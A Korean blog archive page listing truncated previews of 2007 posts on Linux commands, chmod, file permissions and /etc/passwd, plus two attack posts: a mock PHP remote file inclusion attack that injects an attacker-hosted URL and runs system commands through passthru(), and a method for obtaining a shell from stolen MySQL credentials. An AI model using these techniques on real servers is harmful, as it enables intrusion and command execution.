전체 글845 일반적인 리눅스 명령어 모음 일반적인 리눅스 명령어 모음 adduser : 유저를 만들때 사용하는 명령 cd (change directory) : 디렉토리(윈도우에선 폴더) 변경할때 사용 chmod (change mode) : 파일의 허가상태 변경 chown (change owner) : 파일 소유권 병경 chpass : cp (copy) : 복사 date : 현재시작 표시 echo : 표준출력에 문자열을 출력 edquota exit : 작업종료 finger : 현재 로그인되어있는 사용자들의 인적사항출력 find : 파일이나 디렉토리를 찾을때 사용 ftp (file transfer protocol) : 파일을 주고받을때 사용 file : 파일의 종류를 알아보는 명령어 gzip : 압축명령 gunzip : 압축해제명령 hostname.. 2007. 3. 9. 권한설정 chmod (change mode) chmod 파일 또는 디렉토리의 접근 권한을 변경하는 명령이다. 1 chmod의 기본적인 사용법 chmod [-옵션] [모드] [파일명] [옵션] chmod 명령에는 몇가지 옵션이 존재하지만 -R 옵션 외에는 사용할 일이 없기 때문에 -R 옵션만 설명을 하겠다. -R : 퍼미션 변경 대상이 디렉토리일 경우 그 하위 경로에 있는 모든 파일과 디렉토리의 퍼미션을 변경한다. [모드(심볼릭)] 심볼릭 모드와 8진수 모드를 사용할 수 있는데 대부분의 사용자들은 심볼릭 모드 보다 8진수 모드를 선호한다. 그럼 심볼릭 모드부터 공부해 보도록 하자. 심볼릭 모드에서 "u = 소유자, g = 소유 그룹, o = other, a = all, r = 읽기, w = 쓰기, x = 실행"을 의미한다. 심볼릭 모드에서는 권한 추.. 2007. 3. 9. 퍼미션 유닉스/리눅스에는 각 파일, 디렉토리마다 퍼미션이 있습니다. ls -l 의 실행 결과를 보면 다음과 같습니다. www# ls -l total 16392 -r-xr-xr-- 3 root wheel 69296 Jul 21 15:35 CC -r-xr-xr-x 3 root wheel 69864 Jul 21 15:36 Mail -r-xr-xr-x 1 root wheel 100413 Jul 21 15:35 a2p -r-xr-xr-x 1 root wheel 20000 Jul 21 15:35 addftinfo -r-xr-xr-x 15 root wheel 55684 Jul 21 15:36 addr2line -r-xr-xr-x 1 root wheel 165214 Jul 21 15:35 afmtodit -r-xr-xr-x .. 2007. 3. 9. /etc/passwd 구조 리눅스에 등록되어 있는 사용자 계정의 정보는 /etc/passwd 속에 기본적인 내용들이 정의 되어 있다. 아래는 /etc/passwd 파일 안에 내부 파일의 모습이다. root:x:0:0:root:/root:/bin/bash ① ②③④⑤ ⑥ ⑦ ① : 사용자 계정 이름(대부분 ID라고 부른다) ② : 사용자 비밀 번호(x로 되어 있는것은 섀도우 패스워드 시스템에 의해 /etc/shadow 에 암호화된 형태로 저장 되어있음) ③ : 사용자 UID(리눅스의 모든 정보는 수치값으로 저장 되어 있음 root -> 0(UID)) ④ : 사용자 소속 그룹 GID(리눅스의 모든 정보는 수치값으로 저장 되어 있음 root -> 0(GID)) ⑤ : 사용자 정보(이름이나 연락처 같은것을 적는란) ⑥ : 사용자 계정 디.. 2007. 3. 9. PHP Injection 일반적인 PHP injection 공격 방법을 시험해 볼 것이다. 모의 공격을 위해, 공격을 당할 서버에 PHP Injection에 취약한 다음 code를 업로드할 것이다. // test.php [공격 당할 서버 예제 사진] $var 변수에 `test'라는 값을 입력하자, include path error가 출력되었다. 결론적으로 우리는 $var 변수에 공격 코드 URL을 입력하여 명령을 삽입할 수 있게 된다. 그 후, 공격자의 웹서버에 다음 code를 업로드할 것이다. // attack [공격자의 서버 예제 사진] $command 변수를 통해 시스템 명령어를 수행할 수 있도록 passthru() 함수를 사용하였다. 자, 그럼 모의 공격을 시도해보자. 다음과 같이 $var 변수에 `attacker_hos.. 2007. 3. 9. Mysql 을 이용한 쉘 획득법 이런 짓을 실제로 쓸떄가 있나요? -_-; 본인 같은 경우는 실제로 쓸떄가 있었다. 어째든 쓸 경우는 mysql 계정은 획득 했지만, shell은 얻지 못했을 경우 사용하는 것 이다. (*__) 1. 대상 mysql 서버에 접속을 합니다. Administrator>mysql -h dualexample.com -u dual -p Enter password: ************ Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1101 to server version: 4.1.15-Debian_1-log Type 'help;' or '\h' for help. Type '\c' to clear the bu.. 2007. 3. 9. 이전 1 ··· 134 135 136 137 138 139 140 141 다음
